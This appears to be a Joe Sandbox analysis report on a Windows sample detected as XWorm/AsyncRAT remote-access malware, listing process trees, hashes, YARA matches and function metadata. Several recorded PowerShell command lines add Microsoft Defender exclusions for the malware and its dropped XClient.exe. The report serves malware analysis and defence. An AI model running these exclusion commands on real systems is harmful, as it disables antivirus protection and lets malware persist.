Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2929213557.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2929213557.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1655732431.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1655732431.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2935208445.0000000012BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2935208445.0000000012BE1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	23:39:59
Start date:	20/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:39:59
Start date:	20/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	23:40:06
Start date:	20/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'z0LTqIdZ4A.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	23:40:06
Start date:	20/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	23:40:18
Start date:	20/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	23:40:18
Start date:	20/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	23:40:35
Start date:	20/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	23:40:35
Start date:	20/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	23:41:09
Start date:	20/04/2024
Path:	C:\Users\user\AppData\Roaming\XClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\XClient.exe"
Imagebase:	0xd80000
File size:	169'984 bytes
MD5 hash:	67183EA2FDFBAACE4C265DE91E218C59
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 84%, ReversingLabs Detection: 82%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	23:41:18
Start date:	20/04/2024
Path:	C:\Users\user\AppData\Roaming\XClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\XClient.exe"
Imagebase:	0x190000
File size:	169'984 bytes
MD5 hash:	67183EA2FDFBAACE4C265DE91E218C59
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	21%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B89192F Relevance: 1.7, Strings: 1, Instructions: 489
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

SAN_^, xrefs: 00007FFD9B8919E5

Memory Dump Source

Source File: 00000000.00000002.2949819727.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_z0LTqIdZ4A.jbxd

Similarity

API ID:
String ID: SAN_^
API String ID: 0-3629432999
Opcode ID: 7b8420a15df7ff6dcb96915b2f5c19dc61eb56cce4fe18516b185c400aef7265
Instruction ID: 9b3a2130f8bd73838d5f973ce97a02182f056a28bb02b4bf2a913e2f385c27a7
Opcode Fuzzy Hash: 7b8420a15df7ff6dcb96915b2f5c19dc61eb56cce4fe18516b185c400aef7265
Instruction Fuzzy Hash: 7DE1F571B2DA495FEBA8FB68886567877D2FF9C740F04057DE05EC32E6DE28A8414381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B89D634 Relevance: .9, Instructions: 934
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2949819727.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_z0LTqIdZ4A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f246d0b0679e694597aa19ba82492777287c8227bafd39fb4a591367516ae42
Instruction ID: e90adcdce6cace6e72d8749f689a29131af8a4f0a548781f6df86f701922b3e0
Opcode Fuzzy Hash: 1f246d0b0679e694597aa19ba82492777287c8227bafd39fb4a591367516ae42
Instruction Fuzzy Hash: 8D528D34B1D90E8FEFA4EB78C4A5AB976D2EF9C340B510578D41ED32D6DE28E9428740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B897396 Relevance: .5, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2949819727.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_z0LTqIdZ4A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 159858a7dad9807c220f5e08923e2df30b61d8ef7c8208abf751b59274fb3453
Instruction ID: 48556b3baf0eb3939248429252c06ef1599216246588589eb00f884aedd6bc97
Opcode Fuzzy Hash: 159858a7dad9807c220f5e08923e2df30b61d8ef7c8208abf751b59274fb3453
Instruction Fuzzy Hash: 32F19430A09A8D8FEFA9DF28C8557E93BE1FF58310F04426EE85DC7295DB3499458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B898142 Relevance: .5, Instructions: 463
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2949819727.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_z0LTqIdZ4A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d2973809d4ad506acc0869230e86e192d9309e339fddcd4b0ad878efb626c96
Instruction ID: b5f8993435bbce14908ec9185f4ab216346c3c5bcad05fa6857f7c82c768d276
Opcode Fuzzy Hash: 4d2973809d4ad506acc0869230e86e192d9309e339fddcd4b0ad878efb626c96
Instruction Fuzzy Hash: D7E1D530A09A4E4FEFA8DF68C8657E93BD1EF58350F04426ED84DC7295DF7899418B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B892B5D Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFD9B892C32

Memory Dump Source

Source File: 00000000.00000002.2949819727.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_z0LTqIdZ4A.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 507c4e52b468b6a1c60d9e891c3c8ec603c0c5f481db1bb85af622a06430a053
Instruction ID: 259b50ccd4b62097816011eefde432d237c467f667eb83915f1f78f01c60469a
Opcode Fuzzy Hash: 507c4e52b468b6a1c60d9e891c3c8ec603c0c5f481db1bb85af622a06430a053
Instruction Fuzzy Hash: CE41233190C7588FCB19DFA8D845BE97BF0FF5A310F04426EE09AC3692DB246846CB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 6184, Parent PID: 6520COMMON

Executed Functions

Function 00007FFD9B95660A Relevance: .4, Instructions: 421COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1728634256.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1dfda97b99d253372da1396035c2fdc37ff8e958dc24eb8f4d99b8c744f2b4a
Instruction ID: e2c37828abf62401c2a8534efe7c74dc1745985af19cbcf6cdda8d834272f27a
Opcode Fuzzy Hash: e1dfda97b99d253372da1396035c2fdc37ff8e958dc24eb8f4d99b8c744f2b4a
Instruction Fuzzy Hash: 66C14732B2FA8E2FEB64EBE848755B57BD0EF51314B0901BED85CC70E3DA58A9018341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B956649 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1728634256.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05ae42cf21aa4f2c040eae090d9c8d3b35167017a688d8284abc72fa0b927e9e
Instruction ID: 77ec2f5294059f06eeb6eec917c209aade17098f2633a292b7f3cd7daddbf38b
Opcode Fuzzy Hash: 05ae42cf21aa4f2c040eae090d9c8d3b35167017a688d8284abc72fa0b927e9e
Instruction Fuzzy Hash: C2810222B6FB8A2FEBB59BE844745787BD1EF11214B5A00FEC85CCB0E7D958AD058341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B88A112 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1728234481.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa98420060eebc6fb7ce91f252248f08148832f5f25351104a6e7b76360dc8e8
Instruction ID: 48b3da532274a82cbde014fc8df00a254b31dead1de35e2b230d18e60cf2a250
Opcode Fuzzy Hash: aa98420060eebc6fb7ce91f252248f08148832f5f25351104a6e7b76360dc8e8
Instruction Fuzzy Hash: 57F0627190DBCD8FD7579F2488285943FF0EF26201B0A01E7D889CB0B2D6699D48C792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B889758 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1728234481.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53c605fc687f21fefcc4cbd5a38a540a01c61fa4243a24db891b6b86376a4b84
Instruction ID: 479d0d7ffcacbd277193892691d28b25b6be106d6292f72db1b75032a2e30afb
Opcode Fuzzy Hash: 53c605fc687f21fefcc4cbd5a38a540a01c61fa4243a24db891b6b86376a4b84
Instruction Fuzzy Hash: ED310971A1DF4C8FDB589F5CA84A6A97BE0FB98710F00412FE449D3252DA70A9168BC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B76E384 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1727775863.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b76d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fa73b0cf3995eafd5112e1efb8a165b1bfb281d5e69a1d6f6c93c575d167074
Instruction ID: 1bcdb5e2f3988a688ca304f201f77dc91e184500b8ba820150c371bcbe951477
Opcode Fuzzy Hash: 1fa73b0cf3995eafd5112e1efb8a165b1bfb281d5e69a1d6f6c93c575d167074
Instruction Fuzzy Hash: 1A41267190EBC88FE7568B3998559523FF0EF52310B1602EFD088CB1B7D625A846C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B88A62C Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1728234481.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31d11986af45d627869a5405b61a827098ce1794827084d9b260ad2debc1ff28
Instruction ID: 1b1413e3a30848a7d0ec0cf81fce8a299f766f13df5018a6a2064bc0ee44d64c
Opcode Fuzzy Hash: 31d11986af45d627869a5405b61a827098ce1794827084d9b260ad2debc1ff28
Instruction Fuzzy Hash: F421F83190DB4C4FDB59DFAC984A7E97BF0EB96321F04416BD048C3156DA74941ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1728234481.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B95414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1728634256.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff3466bab98e0fc8f127760a521a1f24514be090424d53cda3f06d54247becb9
Instruction ID: ca2edf5fb33a6bfc9ef41f8affa0284478e827cf1aa57eac693af463ffce40f2
Opcode Fuzzy Hash: ff3466bab98e0fc8f127760a521a1f24514be090424d53cda3f06d54247becb9
Instruction Fuzzy Hash: 5EF0E232B4E5498FD7A8EB9CE4519E873E0EF65320B1600BAE06DC72B7CA25EC40C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B954400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1728634256.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec60320696cfa911a4fed7c1c965652bbd65ac66974c26bc59f30f86b4d01aeb
Instruction ID: eb8af54abfb7f2059ecd322af424e06ca67eb3b5914d7027609e53b9e0916f8f
Opcode Fuzzy Hash: ec60320696cfa911a4fed7c1c965652bbd65ac66974c26bc59f30f86b4d01aeb
Instruction Fuzzy Hash: F9F0BE32A8E5498FD7A8EA9CE0609A873E0FF0532070600BAE06DCB1A7CA25BC40C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B9541D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1728634256.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: ef0e477c3a8d88fbc3791122f3f41a252fcdd9f92c2fd245001ca178e7a9b1aa
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: A8E0123175C4089FDAB8DA8CE0519A973E1EBA832171141BBD14EC7675CA21ED518B80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD9B888BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

N_^7, xrefs: 00007FFD9B888C12
N_^4, xrefs: 00007FFD9B888BFA
N_^F, xrefs: 00007FFD9B888C7A
N_^J, xrefs: 00007FFD9B888C8A

Memory Dump Source

Source File: 00000001.00000002.1728234481.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID: N_^4$N_^7$N_^F$N_^J
API String ID: 0-3508309026
Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction ID: 3d73ddd26afee8af5c4e977c855be3ba5e549368567e4c73e868d7912246f78f
Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction Fuzzy Hash: B32107B77084358ED30A7BBCBD289D93740DB9423874501B3D2A9CB183E914608786C1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 7220, Parent PID: 6520COMMON

Executed Functions

Function 00007FFD9B966605 Relevance: .5, Instructions: 452COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1842973220.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4fcbfa1a07152f5d85179415931973c8531a1b1e49a0aa29f258ec0ce8e0e4f
Instruction ID: f21b198f417eacda407b960a4fc0913ef10c311e7a4aa66614bb555f976b06db
Opcode Fuzzy Hash: d4fcbfa1a07152f5d85179415931973c8531a1b1e49a0aa29f258ec0ce8e0e4f
Instruction Fuzzy Hash: 53D13632A1FB8E9FEBA59BA858745F57BA0EF52314B1901FFD44CC70E3D918A9058341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B89A0E0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1842342633.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c98bd83158deaa1a00d7fbfbfb00c771fd6496cc11287a88e516757087a6099
Instruction ID: 16ae813191179a6eb23b9d0e36f0be6b9ec18250aebaa8d88ff9771c317cce12
Opcode Fuzzy Hash: 2c98bd83158deaa1a00d7fbfbfb00c771fd6496cc11287a88e516757087a6099
Instruction Fuzzy Hash: 14218B6690E7CD4FDB179B389C790D47FB0EF17214B0A01E7C089CB0A3E9195849C792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B899770 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1842342633.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8838054798db202b7a158287179872357b8e69c91fc74a318f8e7df70a7dff0
Instruction ID: 67dab83d100685a31166434490945a0b5492690b5a7100a411fccdfd774f344d
Opcode Fuzzy Hash: d8838054798db202b7a158287179872357b8e69c91fc74a318f8e7df70a7dff0
Instruction Fuzzy Hash: D141087190DB8C8FDB199F5C9C4A6A97FE0FB99711F04426FE459C3252CA70A905CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B77F284 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1841518146.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b77d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf95b9922191c9d4d8f258d8a79af4f26396adc2347c268cde6aa9a361341c2
Instruction ID: 83b755a8a15c251f1158ccc6357a017af6b725e97d43e553a5512c1c62d2f976
Opcode Fuzzy Hash: 0cf95b9922191c9d4d8f258d8a79af4f26396adc2347c268cde6aa9a361341c2
Instruction Fuzzy Hash: 3C41267150EBC84FD7568B3898959523FF0EF56220B1A06DFD088CF1B3D629A846C792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B89A64C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1842342633.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 268c180421140ac31621d8d538a752520c8cde243dcff9b6c0caca383187d890
Instruction ID: eb7ea4035f4d3c6ccd3f87fdd779f72889c474952542e29e4713bd372978c180
Opcode Fuzzy Hash: 268c180421140ac31621d8d538a752520c8cde243dcff9b6c0caca383187d890
Instruction Fuzzy Hash: 5721F83190CB4C8FEB59DBAC9C4A7E97FE0EB96321F04416FD049C3162DA749456CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1842342633.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B96414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1842973220.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ed311399efb5321d7108bb70e023d18e7b4586f3f384786704bd895ef46f6ee
Instruction ID: 6acd74d62e7451a8a0a74c931d95d9b9721a2073d671ba042affc58b1556c998
Opcode Fuzzy Hash: 3ed311399efb5321d7108bb70e023d18e7b4586f3f384786704bd895ef46f6ee
Instruction Fuzzy Hash: 59F0BE32B0E5098FD768EB9CE4519E873E0EF6532071600BAE06DC72B3CA25EC40C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B964400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1842973220.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ff26527c1067a8283494624e08a398cb12af5532e67ad39fad15d455725feca
Instruction ID: 93177e50e84b1e993e5b2d4d2dc9052f84976573a621d298af0b609a03761fa3
Opcode Fuzzy Hash: 8ff26527c1067a8283494624e08a398cb12af5532e67ad39fad15d455725feca
Instruction Fuzzy Hash: 61F0BE32A0E5498FD769EB9CE0619A873E0FF0532471600FAE05DCB1A3CA26AC40C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B9641D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1842973220.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD9B898BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

M_^<, xrefs: 00007FFD9B898C12
M_^Q, xrefs: 00007FFD9B898C8A
M_^Y, xrefs: 00007FFD9B898CBA
